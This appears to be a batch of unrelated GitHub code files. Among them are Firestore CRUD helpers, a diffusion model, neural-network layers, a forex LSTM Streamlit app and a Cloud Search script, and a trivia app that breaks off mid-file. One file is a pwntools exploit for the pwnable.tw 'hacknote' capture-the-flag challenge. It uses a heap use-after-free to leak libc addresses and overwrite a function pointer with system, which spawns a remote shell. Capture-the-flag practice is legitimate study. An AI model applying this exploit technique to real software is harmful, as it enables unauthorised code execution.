data={\n# 'ticker': ticker, \n# 'tickername': tickername,\n# 'created_datetime': datetime_SG,\n# 'updated_datetime': datetime_SG,\n# 'marketcap': 0,\n# 'activated': True\n# }\n# db.collection('tickerlisttest').add(data)\n# print (ticker + \" uploaded\")\n# else:\n# print (ticker + \" passed\")\n# k = k + 1\n\n\n\n\n\n\n\n# #########################################################################\n# ####### reading data ####################################################\n# #########################################################################\n\n# # select based on a specific criteria like sector and marketcap\n# market_cap = 1000_000_000\n# docs = db.collection('tickerlisttest').where('marketCap', '>=', market_cap).stream()\n# for i in docs:\n# print (i._data['ticker'])\n\n# sector = \"Technology\"\n# docs = db.collection('tickerlisttest').where('sector', '>=', sector).stream()\n# for i in docs:\n# print (i._data['ticker'])\n\n# # Reading data into another destination\n# tickerlisttest = db.collection('tickerlisttest').get()\n# for i in tickerlisttest:\n# obj = db.collection('tickerlisttest').document(i.id).get()\n\n# print(obj._data['ticker'])\n# print(obj._data['tickername'])\n# print(obj._data['kpi']['sector'])\n# print(obj._data['updated_datetime'])\n\n# # Reading one single ticker\n# docs = db.collection(\"tickerlist\").where(\"ticker\", \"==\", \"NENT-B.ST\").get()\n# print(docs[0]._data['kpi']['currency'])\n\n\n# # if required to do a sort\n# tickerlist = db.collection('tickerlist').where('updated_datetime', '<=', target_datetime).order_by(\"updated_datetime\", direction=firestore.Query.ASCENDING).get()\n\n\n\n# ################################################################\n# ####### deleting documents and fields #########################\n# ################################################################\n\n\n# # delete all documents in a collection\n# collection = \"tickerlisttest\"\n# docs = db.collection(collection).get()\n# for doc in docs:\n# key = doc.id\n# db.collection(collection).document(key).delete()\n\n# # delete kpi fields from a collection\n# collection = \"tickerlisttest\"\n# fieldtodelete = \"longBusinessSummary\"\n# docs = db.collection(collection).get()\n# for doc in docs:\n# key = doc.id\n# db.collection(collection).document(key).update({\n# fieldtodelete: firestore.DELETE_FIELD\n# })\n\n# # delete certain documents in a collection\n# collection = \"kpilist\"\n# docs = db.collection(collection).where(\"rate\", \"==\", 0).get()\n# for doc in docs:\n# key = doc.id\n# print (doc.id)\n# db.collection(collection).document(key).delete()\n\n\n\n\n\n\n######################################################################################\n####### Migrating the real datasets to testing datasets ##########################\n######################################################################################\n# python -c 'from mgt_fb_crud import migrate_to_test; migrate_to_test()'\n\n# equity_daily_kpi_test\n\n#ASCENDING or #DESCENDING\ndef migrate_to_test():\n number_entries = 5\n migrate_from = 'equity_daily_agg'\n migrate_to = 'equity_daily_agg_test'\n\n tickerlist = db.collection(migrate_from).order_by(\"daily_industry_agg_updated_datetime\", direction=firestore.Query.DESCENDING).limit(number_entries).stream()\n\n x=1\n for tick in tickerlist:\n data_dict = {}\n for j in tick._data:\n data_dict[j] = tick._data[j]\n db.collection(migrate_to + str(\"_test\")).document(tick.id).set(data_dict, merge=True)\n print (str(x) + \"/\" + str(number_entries) + \" done\")\n x = x + 1\n\n#############################################################################################################################\n####### Deleting all the data to tickerdatatest (EXTREMELY DANGEROUS CODE) DOUBLE CHECK B4 RUNNING ##########################\n#############################################################################################################################\n# python -c 'from mgt_fb_crud import delete_all_fields; delete_all_fields()'\n\ndef delete_all_fields():\n collection = \"tickerlistpricetest\"\n docs = db.collection(collection).get()\n for doc in docs:\n key = doc.id\n for i in doc.to_dict():\n todelete = i\n db.collection(collection).document(key).update({\n todelete : firestore.DELETE_FIELD\n })\n\n\n\n\n\n\n\n######################################################################################\n####### Investigation ################################################################\n######################################################################################\n\n############## Running the function from the command line ###############\n# python -c 'from mgt_fb_crud import ticker_investigation; ticker_investigation()'\n\nrequired_ticker = 'AAPL'\ndef ticker_investigation():\n docs = db.collection('equity_calc').where(\"ticker\", \"==\", required_ticker).get()\n # print(docs[0]._data['kpi'])\n print(docs[0]._data)\n\n\n\n######################################################################################\n####### Count number of entries ######################################################\n######################################################################################\n\n############## Running the function from the command line ###############\n# python -c 'from mgt_fb_crud import counter_rows; counter_rows()'\ndef counter_rows():\n docs = db.collection('equity_list').get()\n print(len(docs))\n\n\n\n########################################################################################\n########### Sample export dataframe to google sheets #################################\n########################################################################################\n# python -c 'from mgt_fb_crud import sample_df_gs; sample_df_gs()'\n\ndef sample_df_gs():\n name = \"pnl quarterly\"\n sheetinfo = \"Sheet2\"\n companyticker = yf.Ticker(\"meta\")\n df = companyticker.financials\n export_gs_func(name, df, sheetinfo)\n\n\n########################################################################################\n########### Delete unwanted record datetime from the dataset #########################\n########################################################################################\n# python -c 'from mgt_fb_crud import test_delete; test_delete()'\n\n# change the fieldtodelete \"\"\ndef test_delete():\n # delete kpi fields from a collection\n collection = \"tickerlisttest\"\n fieldtodelete = \"\"\n docs = db.collection(collection).get()\n for doc in docs:\n key = doc.id\n db.collection(collection).document(key).update({\n fieldtodelete: firestore.DELETE_FIELD\n })\n\n\n\n########################################################################################\n########### Extracting the time series financials to gs ###############################\n########################################################################################\n# python -c 'from mgt_fin_exp_fb import financials_to_gs; financials_to_gs()'\n\nticker = 'WY'\ndef financials_to_gs():\n docs = db.collection('tickerlisttest').where(\"ticker\", \"==\", ticker).get()[0]\n time_series_financials = docs._data['time_series_financials']\n cashflow = time_series_financials['cashflow']\n df = pd.DataFrame(cashflow)\n name = \"cashflow\"\n sheetinfo = \"Sheet2\"\n export_gs_func(name, df, sheetinfo)\n\n\n\n\n\n\n\n\n\n\n# export_gs_func(name, df ,sheetinfo)\n\n # ## Selected KPIs including usd values \n # kpilistselect2 = [\n # 'updated_datetime', 'ticker','tickername',\n # 'shortName', 'longBusinessSummary','symbol', 'sector', 'industry', 'country', 'marketCap', \n # 'returnOnAssets', 'returnOnEquity', 'revenueGrowth', 'revenuePerShare',\n # 'grossMargins', 'operatingMargins', 'profitMargins', 'ebitdaMargins',\n # 'forwardPE', 'trailingPE', 'earningsQuarterlyGrowth', 'earningsGrowth', 'priceToSalesTrailing12Months', \n # 'trailingEps', 'forwardEps', \n # 'pegRatio', 'trailingPegRatio',\n # 'currentRatio', 'quickRatio', 'debtToEquity', \n # 'bookValue', 'enterpriseValue', 'priceToBook', \n # 'freeCashflow', 'operatingCashflow', 'dividendYield', 'dividendRate', \n # 'totalRevenue', 'grossProfits', 'ebitda', 'totalDebt', 'beta',\n # 'currency', 'financialCurrency',\n # 'heldPercentInsiders', 'heldPercentInstitutions', 'isEsgPopulated',\n # 'trailingAnnualDividendYield', 'trailingAnnualDividendRate', 'fiveYearAvgDividendYield', 'lastDividendValue', 'lastDividendDate',\n # 'targetMedianPrice', 'targetMeanPrice', 'currentPrice',\n # 'marketCapUSD', 'enterpriseValueUSD', 'freeCashflowUSD', 'operatingCashflowUSD', 'totalDebtUSD',\n # 'currentPriceUSD', 'totalRevenueUSD', 'grossProfitsUSD', 'ebitdaUSD'\n # ]\n\n\n\n\n \n\n\n\n\n","repo_name":"yuong1979/yfinance-project","sub_path":"mgt_fb_crud.py","file_name":"mgt_fb_crud.py","file_ext":"py","file_size_in_byte":11735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42258451400","text":"\nfrom Gangeinstellen import Gangeinstellen as GE\nfrom Zange import Zange\n\n\n\ndef test_oeffnen():\n zange = Zange()\n pG = GE(zange)\n pG.oeffnen()\n assert zange.geoeffnet == True\n\ndef test_einstellen():\n zange = Zange()\n pG = GE(zange)\n pG.einstellen()\n assert zange.eingestellt == True\n\ndef test_pruefen():\n zange = Zange()\n pG = GE(zange)\n pG.pruefen()\n assert zange.geprueft == True\n\n","repo_name":"TimSchrick/Zangenherstellung","sub_path":"Gangeinstellen_test.py","file_name":"Gangeinstellen_test.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"4122165383","text":"from typing import List, Tuple, Dict\n\nimport torch\nfrom torch import Tensor\nimport pyrootutils\n\npyrootutils.setup_root(__file__, indicator=\".project-root\", pythonpath=True)\n\nfrom src.models.unet import UNet\nfrom src.models.diffusion.net import DiffusionModel\nfrom src.models.diffusion.sampler import BaseSampler\n\n\nclass ConditionDiffusionModel(DiffusionModel):\n \"\"\"\n ### Condition Diffusion Model\n \"\"\"\n\n def __init__(\n self,\n denoise_net: UNet,\n sampler: BaseSampler,\n image_embedder: torch.nn.Module = None,\n text_embedder: torch.nn.Module = None,\n n_train_steps: int = 1000,\n img_dims: Tuple[int, int, int] = [1, 32, 32],\n gif_frequency: int = 20,\n ) -> None:\n \"\"\"_summary_\n \n Args:\n denoise_net (UNet): model to learn noise\n sampler (BaseSampler): mampler for process with image in diffusion\n image_embedder (torch.nn.Module, optional): _description_. Defaults to None.\n text_embedder (torch.nn.Module, optional): _description_. Defaults to None.\n n_train_steps (int, optional): the number of diffusion step for forward process. Defaults to 1000.\n img_dims (Tuple[int, int, int], optional): resolution of image - [channels, width, height]. Defaults to [1, 32, 32].\n gif_frequency (int, optional): _description_. Defaults to 20.\n \"\"\"\n super().__init__(denoise_net, sampler, n_train_steps, img_dims,\n gif_frequency)\n self.image_embedder = image_embedder\n self.text_embedder = text_embedder\n\n def get_image_embedding(self, image: torch.Tensor):\n return self.image_embedder(image)\n\n def get_text_embedding(self, text: torch.Tensor):\n return self.text_embedder(text)\n\n def forward(self,\n x0: Tensor,\n sample_steps: Tensor | None = None,\n noise: Tensor | None = None,\n cond: Dict[str, Tensor] = None) -> Tuple[Tensor, Tensor]:\n \"\"\"_summary_\n ### forward diffusion process to create label for model training\n Args:\n x0 (Tensor): _description_\n sample_steps (Tensor | None, optional): _description_. Defaults to None.\n noise (Tensor | None, optional): _description_. Defaults to None.\n cond (Dict[str, Tensor], optional): _description_. Defaults to None.\n\n Returns:\n Tuple[Tensor, Tensor]:\n - pred: noise is predicted from xt by model\n - target: noise is added to (x0 -> xt)\n \"\"\"\n\n if cond is not None:\n if 'image' in cond.keys() and self.image_embedder is not None:\n cond['image'] = self.get_image_embedding(cond['image'])\n\n if 'text' in cond.keys():\n assert ('text' in cond.keys()) == (self.text_embedder\n is not None)\n cond['text'] = self.get_text_embedding(cond['text'])\n\n return super().forward(x0, sample_steps, noise, cond)\n\n @torch.no_grad()\n def sample(self,\n xt: Tensor | None = None,\n sample_steps: Tensor | None = None,\n cond: Dict[str, Tensor] = None,\n num_sample: int | None = 1,\n noise: Tensor | None = None,\n repeat_noise: bool = False,\n device: torch.device = torch.device('cpu'),\n prog_bar: bool = False) -> List[Tensor]:\n \"\"\"_summary_\n ### reverse diffusion process\n Args:\n xt (Tensor | None, optional): _description_. Defaults to None.\n sample_steps (Tensor | None, optional): _description_. Defaults to None.\n cond (Dict[str, Tensor], optional): _description_. Defaults to None.\n num_sample (int | None, optional): _description_. Defaults to 1.\n noise (Tensor | None, optional): _description_. Defaults to None.\n repeat_noise (bool, optional): _description_. Defaults to False.\n device (torch.device, optional): _description_. Defaults to torch.device('cpu').\n prog_bar (bool, optional): _description_. Defaults to False.\n\n Returns:\n List[Tensor]: _description_\n \"\"\"\n\n if cond is not None:\n if 'image' in cond.keys() and self.image_embedder is not None:\n cond['image'] = self.get_image_embedding(cond['image'])\n\n if 'text' in cond.keys():\n assert ('text' in cond.keys()) == (self.text_embedder\n is not None)\n cond['text'] = self.get_text_embedding(cond['text'])\n\n return super().sample(xt, sample_steps, cond, num_sample, noise,\n repeat_noise, device, prog_bar)\n\n\nif __name__ == \"__main__\":\n import hydra\n from omegaconf import DictConfig\n\n root = pyrootutils.find_root(search_from=__file__,\n indicator=\".project-root\")\n config_path = str(root / \"configs\" / \"model\" / \"diffusion\" / \"net\")\n print(\"root: \", root)\n\n @hydra.main(version_base=None,\n config_path=config_path,\n config_name=\"condition_diffusion_model.yaml\")\n def main(cfg: DictConfig):\n cfg['n_train_steps'] = 1000\n cfg['img_dims'] = [1, 32, 32]\n cfg['sampler']['n_train_steps'] = 1000\n cfg['denoise_net']['d_cond_image'] = 1\n cfg['denoise_net']['n_classes'] = 2\n # print(cfg)\n\n condition_diffusion_model: ConditionDiffusionModel = hydra.utils.instantiate(\n cfg)\n\n x = torch.randn(2, 1, 32, 32)\n t = torch.randint(0, cfg['n_train_steps'], (2, ))\n cond = {\n 'label': torch.randint(0, cfg['denoise_net']['n_classes'], (2, )),\n 'image': torch.rand_like(x),\n }\n\n print('***** CONDITION DIFFUSION MODEL *****')\n\n print('=' * 15, ' forward process ', '=' * 15)\n print('Input:', x.shape)\n xt = condition_diffusion_model.sampler.step(x, t)\n pred, target = condition_diffusion_model(x, cond=cond)\n pred, target = condition_diffusion_model(x, cond=cond)\n print('xt:', xt.shape)\n print('Prediction:', pred.shape)\n print('Target:', target.shape)\n\n print('=' * 15, ' reverse process ', '=' * 15)\n gen_samples = condition_diffusion_model.sample(num_sample=2,\n cond=cond,\n prog_bar=True)\n print(len(gen_samples), gen_samples[0].shape)\n\n main()\n","repo_name":"huynhspm/Generative-Model","sub_path":"src/models/diffusion/net/condition_diffusion_model.py","file_name":"condition_diffusion_model.py","file_ext":"py","file_size_in_byte":6661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72252373277","text":"from typing import Dict\n\nfrom util.file_util import read_input_file\n\n\ndef parse_input_file() -> Dict[int, int]:\n lines = read_input_file(10)\n value_at_cycle: Dict[int, int] = {}\n cycle = 1\n value = 1\n for line in lines:\n value_at_cycle[cycle] = value\n if line == \"noop\":\n cycle += 1\n else:\n parts = line.split(\" \")\n if parts[0] == \"addx\":\n add_value = int(parts[1])\n cycle += 1\n value_at_cycle[cycle] = value\n cycle += 1\n value += add_value\n else:\n raise ValueError(f\"Couldn't parse line: {line}\")\n return value_at_cycle\n\n\ndef level10_1() -> int:\n value_at_cycle = parse_input_file()\n result = 0\n for target_cycle in [20, 60, 100, 140, 180, 220]:\n result += target_cycle * value_at_cycle[target_cycle]\n return result\n\n\ndef level10_2() -> str:\n value_at_cycle = parse_input_file()\n output = \"\"\n for i in range(240):\n value = value_at_cycle[i + 1]\n distance = abs(value - i % 40)\n if distance < 2:\n output += \"#\"\n else:\n output += \".\"\n return output\n\n\nif __name__ == '__main__':\n print(f\"Signal strength: {level10_1()}\")\n _result = level10_2()\n for _i in range(0, 240, 40):\n print(_result[_i:_i+40])\n","repo_name":"DerDodo/AdventOfCode2022","sub_path":"solutions/level10.py","file_name":"level10.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9892142628","text":"import numpy as np\nfrom tensorwow.im2col import im2col_indices\n\n\nclass FullyConnectedLayer(object):\n def __init__(self, num_input_units, num_output_units, activation_func, weights_initializer, bias_initializer):\n \"\"\"\n :param num_input_units: Number of input dimensions D\n :param num_output_units: Number of output dimensions O\n :param activation_func: Activation function\n :param weights_initializer: Weights initializer\n :param bias_initializer: Bias initializer\n \"\"\"\n self._num_input_units = num_input_units\n self._num_output_units = num_output_units\n self._activation_func = activation_func\n\n # Disable default initialization\n # self._weights = weights_initializer.initialize((num_input_units, num_output_units))\n # self._bias = bias_initializer.initialize((num_output_units))\n\n self._x = None\n self._z = None\n self._a = None\n self._dw = None\n self._db = None\n\n @property\n def num_input_units(self):\n return self._num_input_units\n\n @property\n def num_output_units(self):\n return self._num_output_units\n\n @property\n def weights(self):\n \"\"\"\n :return: D x M matrix\n \"\"\"\n return self._weights\n\n @weights.setter\n def weights(self, weights):\n if weights.shape != (self._num_input_units, self._num_output_units):\n raise ValueError(\"Invalid dimensions\")\n\n self._weights = weights\n\n @property\n def bias(self):\n \"\"\"\n :return: vector of length M\n \"\"\"\n return self._bias\n\n @bias.setter\n def bias(self, bias):\n if bias.shape != (self._num_output_units,):\n raise ValueError(\"Invalid dimensions\")\n\n self._bias = bias\n\n def forward(self, x):\n \"\"\"\n\n :param x: N x D matrix\n :return: N x M matrix\n \"\"\"\n assert len(x.shape) == 2, \"Inputs must be a two-dimensional tensor\"\n assert x.shape[1] == self._num_input_units, \"Inputs does not match input size\"\n\n z = np.dot(x, self._weights) + self._bias\n a = self._activation_func.compute(z)\n\n # Cache values for backward step\n self._x = x\n self._z = z\n self._a = a\n\n return a\n\n\nclass ConvLayer(object):\n def __init__(self, kernel_size, num_input_channels, num_filters, activation_func, weights_initializer, bias_initializer, stride=1, padding=1):\n self._kernel_size = kernel_size\n self._num_input_channels = num_input_channels\n self._num_filters = num_filters\n self._padding = padding\n self._stride = stride\n self._activation_func = activation_func\n\n # Disable default initialization\n # self._weights = weights_initializer.initialize((kernel_size, kernel_size, num_input_channels, num_filters))\n # self._bias = bias_initializer.initialize((num_filters, 1))\n\n @property\n def weights(self):\n \"\"\"\n :return: Weight matrix of shape (kernel_size, kernel_size, num_input_channels, num_filters)\n \"\"\"\n return self._weights\n\n @property\n def bias(self):\n \"\"\"\n :return: Bias vector of length num_filters\n \"\"\"\n return self._bias\n\n @weights.setter\n def weights(self, weights):\n if weights.shape != (self._kernel_size, self._kernel_size, self._num_input_channels, self._num_filters):\n raise ValueError(\"Invalid dimensions\")\n\n self._weights = weights\n\n @bias.setter\n def bias(self, bias):\n if bias.shape != (self._num_filters,):\n raise ValueError(\"Invalid dimensions\")\n\n self._bias = bias\n\n def forward(self, x):\n \"\"\"\n Computes the correlation of each input sample with the layer's kernel matrix\n :param x: input images of shape [num_samples, height, width, input_channels]\n :return: feature maps of shape [num_samples, height, width, num_filters]\n \"\"\"\n assert len(x.shape) == 4, \"Inputs must be a three-dimensional tensor\"\n assert x.shape[3] == self._num_input_channels, \"Inputs does not match required input channels\"\n\n num_samples, height, width, channels = x.shape\n assert (height - self._kernel_size + 2 * self._padding) % self._stride == 0, \"Invalid dimensions\"\n assert (width - self._kernel_size + 2 * self._padding) % self._stride == 0, \"Invalid dimensions\"\n\n output_height = (height - self._kernel_size + 2 * self._padding) // self._stride + 1\n output_width = (width - self._kernel_size + 2 * self._padding) // self._stride + 1\n\n x_col = im2col_indices(x, self._kernel_size, self._kernel_size, padding=self._padding, stride=self._stride)\n # Move filter kernels to the front before reshaping to [num_filters, ...]\n # To make the filter matrix appear for each channel contiguously, move the channels dimension to the front as well\n weights_col = self._weights.transpose(3, 2, 0, 1).reshape(self._num_filters, -1)\n\n z = np.dot(weights_col, x_col) + self._bias[:, None]\n a = self._activation_func.compute(z)\n # Found this order through experimenting\n a = a.reshape(self._num_filters, num_samples, output_height, output_width).transpose(1, 2, 3, 0)\n\n return a\n\n\nclass MaxPoolLayer(object):\n def __init__(self, window_size, padding, stride):\n self._window_size = window_size\n self._padding = padding\n self._stride = stride\n\n def forward(self, x):\n num_samples, height, width, num_channels = x.shape\n assert (height - self._window_size) % self._stride == 0, \"Invalid dimensions\"\n assert (width - self._window_size) % self._stride == 0, \"Invalid dimensions\"\n output_height = (height - self._window_size) // self._stride + 1\n output_width = (width - self._window_size) // self._stride + 1\n\n x_prep = x.transpose(0, 3, 1, 2).reshape(num_samples * num_channels, height, width, 1)\n x_col = im2col_indices(x_prep, self._window_size, self._window_size, padding=self._padding, stride=self._stride)\n max_indices = np.argmax(x_col, axis=0)\n z = x_col[max_indices, range(len(max_indices))]\n z = z.reshape(num_samples, num_channels, output_height, output_width).transpose(0, 2, 3, 1)\n\n return z\n","repo_name":"fausecteam/faustctf-2018-jodlgang","sub_path":"src/jodlgang/tensorwow/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"40093047008","text":"import streamlit as st\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom datetime import datetime\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom pandas.plotting import register_matplotlib_converters\r\nregister_matplotlib_converters()\r\nimport MetaTrader5 as mt5\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom tensorflow.keras.models import Sequential, load_model\r\nfrom tensorflow.keras.layers import Dense, Dropout, LSTM\r\nimport tensorflow as tf\r\nfrom PIL import Image\r\n\r\nst.write(\"\"\"\r\n# EUR/GBP PRICES PREDICTION\r\n# *euro vs great british pound*\r\n\"\"\")\r\nwith st.form(key = 'my_form'):\r\n username = st.text_input('identifiant')\r\n password = st.text_input('mot de passe')\r\n st.form_submit_button('Login')\r\n \r\n# connect to MetaTrader 5\r\nif not mt5.initialize(server=\"MetaQuotes-Demo\", login=57154335, password=\"\"):\r\n print(\"initialize() failed, error code =\",mt5.last_error())\r\n mt5.shutdown()\r\n# st.write((mt5.terminal_info()))\r\n# st.write((mt5.version()))\r\neurgbp_rates = mt5.copy_rates_from_pos(\"EURGBP\", mt5.TIMEFRAME_M10, 0, 21)\r\n\r\nmt5.shutdown() \r\nst.write('Les donn��es de prédiction sont chargées')\r\ndf = pd.DataFrame(eurgbp_rates)\r\n\r\n\r\n#Prepare Data\r\n\r\ndf.drop(['time', 'open', 'high', 'low', 'tick_volume', 'spread',\r\n 'real_volume'], axis=1, inplace = True)\r\n\r\n#st.dataframe(df)\r\ndata = list(df['close'])\r\nif st.checkbox('Voir les données'):\r\n st.subheader('Les 20 dernières valeurs')\r\n st.write(data)\r\n\r\n# preparing independent and dependent features\r\ndef prepare_data(timeseries_data, n_features):\r\n\tX, y =[],[]\r\n\tfor i in range(len(timeseries_data)):\r\n\t\t# find the end of this pattern\r\n\t\tend_ix = i + n_features\r\n\t\t# check if we are beyond the sequence\r\n\t\tif end_ix > len(timeseries_data)-1:\r\n\t\t\tbreak\r\n\t\t# gather input and output parts of the pattern\r\n\t\tseq_x, seq_y = timeseries_data[i:end_ix], timeseries_data[end_ix]\r\n\t\tX.append(seq_x)\r\n\t\ty.append(seq_y)\r\n\treturn np.array(X), np.array(y)\r\n\r\n#call the model\r\nn_steps, n_features = 20, 1\r\n# define model\r\nmodel = Sequential()\r\nmodel.add(LSTM(50, activation='relu', return_sequences=True, input_shape=(n_steps, n_features)))\r\nmodel.add(LSTM(50, activation='relu'))\r\nmodel.add(Dense(1))\r\nmodel.compile(optimizer='adam', loss='mse')\r\n\r\nmodel.load_weights('univ_v1_model.h5')\r\n\r\n# demonstrate prediction for next 10 candles\r\nx_input = np.array(data)\r\ntemp_input=list(x_input)\r\nlst_output=[]\r\ni=0\r\nn_steps=20\r\nn_features=1\r\nwhile(i<10):\r\n \r\n if(len(temp_input)>3):\r\n x_input=np.array(temp_input[1:])\r\n st.write(\"{} candle input {}\".format(i,x_input))\r\n #print(x_input)\r\n x_input = x_input.reshape((1, n_steps, n_features))\r\n #print(x_input)\r\n yhat = model.predict(x_input, verbose=0)\r\n st.write(\"{} candle output {}\".format(i,yhat))\r\n temp_input.append(yhat[0][0])\r\n temp_input=temp_input[1:]\r\n #print(temp_input)\r\n lst_output.append(yhat[0][0])\r\n i=i+1\r\n else:\r\n x_input = x_input.reshape((1, n_steps, n_features))\r\n yhat = model.predict(x_input, verbose=0)\r\n st.write(yhat[0])\r\n temp_input.append(yhat[0][0])\r\n lst_output.append(yhat[0][0])\r\n i=i+1\r\n \r\n# Output\r\nst.write(\"LA VALEUR A LA FERMETURE POUR LES 10 BOUGIES SUIVANTES:\")\r\nst.write(lst_output)\r\n\r\n# Visualizing The Output\r\nif st.checkbox('Show trend'):\r\n st.subheader('Visualisation de la prediction')\r\n st.write('La possible tendance de la prediction sur EUR/GBP est :')\r\n #st.line_chart(lst_output)\r\n image = Image.open('img.png')\r\n st.image(image, caption='eurgbp trend')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#st.line_chart(lst_output)","repo_name":"bolares/RB_CAPITAL","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13485065421","text":"from pwn import *\n\nsh = remote('chall.pwnable.tw', 10102)\n# sh = process('./hacknote')\nelf = ELF('./hacknote')\n\nlibc = ELF('./libc_32.so.6')\n\ndef add_note(size, content):\n sh.recvuntil('Your choice :')\n sh.sendline('1')\n sh.recvuntil('Note size :')\n sh.sendline(str(size))\n sh.recvuntil('Content :')\n sh.sendline(str(content))\n\ndef delete_note(index):\n sh.recvuntil('Your choice :')\n sh.sendline('2')\n sh.recvuntil('Index :')\n sh.sendline(str(index))\n\ndef print_note(index):\n sh.recvuntil('Your choice :')\n sh.sendline('3')\n sh.recvuntil('Index :')\n sh.sendline(str(index))\n\nprint_puts = 0x0804862b\nputs_got = elf.got['puts']\n\nadd_note(20, 'aaaa')\nadd_note(20, 'aaaa')\ndelete_note(0)\ndelete_note(1)\n\nadd_note(0x8, p32(print_puts) + p32(puts_got))\nprint_note(0)\nputs_addr = u32(sh.recv(4))\n\nputs_libc = libc.symbols['puts']\nsys_libc = libc.symbols['system']\nsys_addr = puts_addr - puts_libc + sys_libc\n\ndelete_note(2)\nadd_note(0x8, p32(sys_addr) + ';sh\\x00')\nprint_note(0)\n\nsh.interactive()\nsh.close()","repo_name":"Coldwave96/PwnProjects","sub_path":"pwnable/hacknote/hacknote.py","file_name":"hacknote.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"11490850106","text":"\r\ndef main_func(list1,rows, columns):\r\n result=[] \r\n start = 0\r\n end = columns\r\n for i in range(rows): \r\n result.append(list1[start:end])\r\n start +=columns\r\n end += columns \r\n for i in result:\r\n for j in range(len(i)):\r\n print(i[j],' ',end='')\r\n print()\r\n\r\n\r\nn=int(input())\r\narr=[]\r\nfor i in range(n):\r\n for j in range(n):\r\n if(i == 0 or i == n - 1 or j == 0 or j == n - 1\r\n or i == j or j == (n - 1 - i)):\r\n a=arr.append('#')\r\n else:\r\n a=arr.append(' ')\r\nmain_func(arr, n, n)","repo_name":"Raghuram224/ZEST","sub_path":"Hacktober_day18.py","file_name":"Hacktober_day18.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"46842399701","text":"import argparse\nimport base64\nimport json\nimport logging\nimport os\n\nimport google.oauth2.credentials\nimport googleapiclient.http\n\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom google_auth_oauthlib.flow import InstalledAppFlow\n\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger('cloudsearch.schema')\n\n# Scope grants [CLOUD SEARCH]\nSEARCH_SCOPES = ['https://www.googleapis.com/auth/cloud_search']\nSEARCH_API_SERVICE_NAME = 'cloudsearch'\nSEARCH_API_VERSION = 'v1'\n\n\ndef get_authenticated_service(service_account_file, scope, service_name, version):\n # Create credentials from Service Account File\n credentials = service_account.Credentials.from_service_account_file(\n service_account_file, scopes=scope)\n return build(service_name, version, credentials=credentials, cache_discovery=False)\n\n\ndef cloud_search_delete_schema(service, datasources):\n schema = service.indexing().datasources().deleteSchema(\n name=\"datasources/\"+datasources).execute()\n return schema\n\n\ndef main(service_account_file, datasources):\n # Create a service instance\n try:\n service_search = get_authenticated_service(\n service_account_file,\n SEARCH_SCOPES,\n SEARCH_API_SERVICE_NAME,\n SEARCH_API_VERSION)\n LOGGER.info(\"Delete schema - START\")\n # Delete Schema from the Datasource\n delete = cloud_search_delete_schema(service_search, datasources)\n LOGGER.info(\"Delete: %s\" % delete)\n LOGGER.info(\"Delete schema - END\")\n # Example code only. Add proper exception handling\n except Exception as e:\n LOGGER.error('Error %s' % e)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Example to handle CRUD for CloudSearch Schema.')\n parser.add_argument('--service_account_file', dest='service_account_file',\n help='File name for the service account.')\n parser.add_argument('--datasources', dest='datasources',\n help='DataSource to update.')\n\n args = parser.parse_args()\n\n main(args.service_account_file, args.datasources)\n","repo_name":"google-cloudsearch/connector-api-python","sub_path":"schema_delete.py","file_name":"schema_delete.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"72385338398","text":"from tkinter import *\nfrom tkinter import ttk\nfrom json import loads\nfrom requests import get\nfrom random import shuffle\n\n#\t\t\tred blue yellow green orange purple lime dark blue pink sand\nColors = [\"#FD7B7B\", \"#7F6AC2\", \"#FDE77B\", \"#69D869\", \"#FDC57B\", \"#A450A4\", \"#DFF477\", \"#5581A3\", \"#C6659C\", \"#F7C57D\"]\nAcColors = [\"#D14141\", \"#4A3490\", \"#D1B841\", \"#34A734\", \"#D19341\", \"#882A88\", \"#B2CA3F\", \"#306186\", \"#E3A5C8\", \"#FBD59E\"]\n\nBGColor = \"#F6FFB4\"\n\nURL = \"https://the-trivia-api.com/v2/questions\"\n\nquestions = loads(get(f\"{URL}?categories={category}\").text)\nprint(questions[0]['category'])\nQuestions, Answers, TrueAnswers = [],[],[]\nButtonArr = [0] * 4\nQuestionTextLabel = [0]\nAnswerBox = [0]*2\nQuestionNum = 0\nBoxesAmount = 1\nQuestionAmount = len(questions)\nAnswersAmount = len(questions[0][\"incorrectAnswers\"])+1\n\n# создание листов ответов и вопросов\ndef CreateFun():\n\tfor question in questions:\n\t\tQuestions.append(question[\"question\"][\"text\"])\n\t\tTrueAnswers.append(question[\"correctAnswer\"])\n\t\tanswers = question[\"incorrectAnswers\"]\n\t\tanswers.append(question[\"correctAnswer\"])\n\t\tshuffle(answers)\n\t\tAnswers.append(answers)\n\treturn Answers\n\nFalses = 0\nTrues = 0\n\n\n# хрен знает зачем\n# if AnswersAmount % 4 == 0 and AnswersAmount > 8:\n# \tBoxesAmount = 4\n# elif AnswersAmount % 3 == 0 and AnswersAmount > 6:\n# \tBoxesAmount = 3\n# elif 